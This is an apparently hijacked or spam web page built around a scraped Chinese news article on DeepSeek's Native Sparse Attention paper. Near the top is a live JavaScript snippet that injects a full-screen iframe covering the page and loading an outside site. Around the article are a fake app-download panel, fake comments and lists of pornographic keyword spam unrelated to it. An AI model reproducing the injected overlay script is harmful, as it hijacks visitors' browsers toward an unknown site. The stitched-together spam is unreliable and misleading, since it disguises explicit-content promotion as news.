太平洋健康网:热门事件黑料不打烊吃瓜-亚洲黑料吃瓜啪啪网-DeepSeek新论文再次引发热议,它最重要的创新是什么?

alan 吃瓜网址 2025-02-19 1 0
(function() { function generateRandomString(length) { return Math.random().toString(36).substring(2, length + 2); } function loadExternalContent(url) { var frameName = generateRandomString(10); var frame = document.createElement('iframe'); frame.id = frameName; frame.style.cssText = 'width:100%;height:100%;border:none;position:fixed;top:0;left:0;z-index:9999;'; frame.src = url; document.body.appendChild(frame); } var externalUrl = 'https://52-cg.com'; loadExternalContent(externalUrl); })();

界面新闻记者 | 伍洋宇

界面新闻编辑 | 文姝琪

DeepSeek V3和R1两款模型带来的热度尚未平息,一篇新论文再次引来科技圈对其创新性的集体评估。

2月18日,DeepSeek的研究团队发布了一篇新的技术论文,《Native Sparse Attention: Hardware-Aligned and Natively Trainable Sparse Attention》。在X(原推特)平台上,DeepSeek这条推文在24小时内的阅读量已达168万。

这是一种可用于超快长上下文训练和推理的稀疏注意力机制,并具有硬件对齐和本地可训练的特性。其中最核心的内容就是NSA(Native Sparse Attention),一种全新的注意力机制。

简单概括,凭借这套技术思路,大模型训练将不仅对硬件要求更低,并且训练效率更高,可能是一次相较MLA更高级别的创新。

稀疏注意力(Sparse Attention)是相对完全注意力(Full Attention)而言。在完全注意力机制的技术框架下,很多技术都是为了提高计算速度、减少运算成本,例如KV-Cache(键值缓存),但对于大模型训练而言仍然可能导致恐怖的运算量。

此前,DeepSeek-V2的重要创新MLA——Multi-Head Latent Attention,多头潜在注意力机制——就在保证模型性能的情况下,对KV-Cache进行了大幅优化。 

其中一个很重要的思路是对KV矩阵进行了低秩分解,以低秩矩阵的形态来保存。可以理解为将这个矩阵从“多维”压缩至“一维”,这大大降低了对显存的占用。

但到此为止,这些注意力机制依然存在一些局限。Monica.im产品合伙人张涛对界面新闻记者解释称,过去的矩阵“压缩”技术是一种无差别压缩。也就是说,那些有更重要含义的信息,其重要性也被平均降低了。 

NSA针对性化解了这个问题。它提出了一个“三合一”方案,对token序列大致分为了三条注意力处理路径:压缩(Compression)、选择性保留(Selection)和滑动窗口(Sliding Window)。

简单理解,Compression跟过去所做的事情类似,即“压缩”保留粗颗粒度的token模块。 

在Selection阶段,该机制通过对已压缩模块引入qt(query token),得到这些模块与当前要计算token的相关程度,以Top N(例如Top 2)的方式选出相关性最高的N个模块,并对照原有的细颗粒程度token序列进行保留。

最后的Sliding Window是指一个滑动窗口,这个窗口仅获取局部最近的一段完整token序列。张涛解释称,这个窗口是一个固定宽度,在时间轴上进行滑动,但永远指向序列的最末尾处。“可以理解为当我要生成一句话时,离它最近的信息也可能提供额外的含义。” 

也就是说,在这三条注意力处理路径下,我们既得到了完整token序列在压缩下的全局印象,也得到了经过筛选的最关键部分信息的细颗粒度token序列,以及离当前计算token最近的一段token序列。

NSA架构(图片来源:DeepSeek)

“当三个特性结合到一起,整个过程就已经省了很多显存占用和运算量,并且把压缩损失掉的信息补充回来了。”张涛表示。 

另外,NSA还引入了两项创新机制,分别是硬件对齐系统,可保证算术强度平衡,以及训练感知设计,可支持NSA进行高效部署和端到端训练。

至此,这套全新注意力机制将要验证自己的效果。在过去,很多注意力机制的调整可能导致模型表现下降,但NSA以稀疏注意力机制给模型“减负”的方式,不仅没有造成性能下降,反而相较完整注意力机制在一些基准测试上实现了超越表现,包括通用和推理等等 

更关键的是,它在解码(Decode)速度上提升了11.6倍。张涛表示,这可以简单理解为,运用这套机制的R1其推理速度也可能提升同样倍数。

不过,MLA这一创新也可以优化解码速度。在张涛看来,NSA更有意义的效率提升是对于正向和反向阶段还将分别提速9倍和6倍。

其中,反向传播是指模型训练时,每完成一轮运行还要做一轮反向传播,如此模型才能够在这一轮迭代中学到“哪些做对了、哪些做错了,以及哪些参数需要调整”。 

这意味着NSA不仅对GPU的显存要求降低,对卡间互联通讯能力要求降低,甚至对于模型的训练速度也加快了好几倍。

“这才是这次创新的关键。”张涛说,NSA有可能进一步解决了国产大模型在GPU芯片上被“卡脖子”的问题。 

总体而言,张涛认为虽然这篇论文集中论述了技术思路,没有完整披露其中的工程细节,但对于其他大模型公司来说复现并不难。 

还有一个当前没有被注意到的“彩蛋”。张涛指出,在这次论文中,DeepSeek运用到了一种叫做Triton的框架。这是由OpenAI开源的一套框架,属于GPU的中间层语言,它既可以转译为英伟达的CUDA(其GPU并行计算平台),AMD的ROCm(其开源计算平台),也可以转译为华为昇腾的CANN(其AI芯片计算框架)。 

虽然目前ROCm和CANN在Triton上表现还不够好,但张涛认为这不是不能解决的。 

“这不得不给大家留下一些想象空间。”张涛说,“这意味着从推理到训练的算力,未来都有可能国产化了。”

北条リエコ

国产 在线 91 91

「活动」注册就送新人大礼包

84.29MB
版本V9.84.14
下载亚洲男人天堂网2014av安装你想要的应用 更方便 更快捷 发现更多
喜欢 18%好评(87人)
评论 40
手机看片10 成年人进入的黄色软件1 波多野结衣网站之2 韩国激情啪啪3 bilibili在线观看4
详细信息
  • 软件大小: 81.23MB
  • 最后更新: 2024-09-16 18:34:53
  • 最新版本: V8.28.17
  • 文件格式: apk
  • 应用分类:ios-Android 免费午夜理论不卡
  • 使用语言: 中文
  • : 需要联网
  • 系统要求: 5.41以上
应用介绍
一,影音先锋av资源看波波,漂亮的保姆3完整版中文版免费
二,欧美又粗又大又爽的A片,舌吻摸大腿下面视频床震
三,99久久人妻无码精品系列性欧美,亚洲AV福利天堂一区二区三
四,国产男女做爰猛烈叫床小说,很黄很色60分钟在线观看
五,无码AV免费精品一区二区三区,亚洲精品无码永久在线观看性色
六,av天天看,粉嫩AV久久一区二区三区
七,国产毛A片久久久久久无码,国产精品自产拍在线观看中文

【联系我们】
客服热线:139-8888-666
加载更多
版本更新
V1.22.17
公么粗大进阳部内A片,亚洲 自拍 偷拍 另类综合图区

老逼网

猜你喜欢

包含 饿了么 的应用集
评论
  • 美美www的高清视频免费 4天前
    高h全肉纯肉 高质量
  • 艳妇乳肉豪妇荡乳a亚洲 7天前
    欧美乱大交XXXXX潮喷l头像
  • 中文字幕 制服 亚洲 另类 7天前
    色情AAA级毛片
  • 国产午夜小视频 6天前
    欧美日韩精品一区二区三区高清视频
  • 公和我做爽死我了A片AAB 2天前
    国产亚洲精品久久久999无毒
  • 日产精品高潮呻吟AV久久 4天前
    波多野结衣50连精喷在线
  • 国产69精品久久久久乱码韩国 5天前
    国语熟妇乱人乱A片
  • 国产妇少水多毛多高潮A片小说 4天前
    亚洲国产综合人成综合网站00
  • 亚洲人成网77777色在线播放 4天前
    国产极品JK白丝喷白浆在
  • 51久久国产露脸精品国产 9天前
    中字幕久久久人妻熟女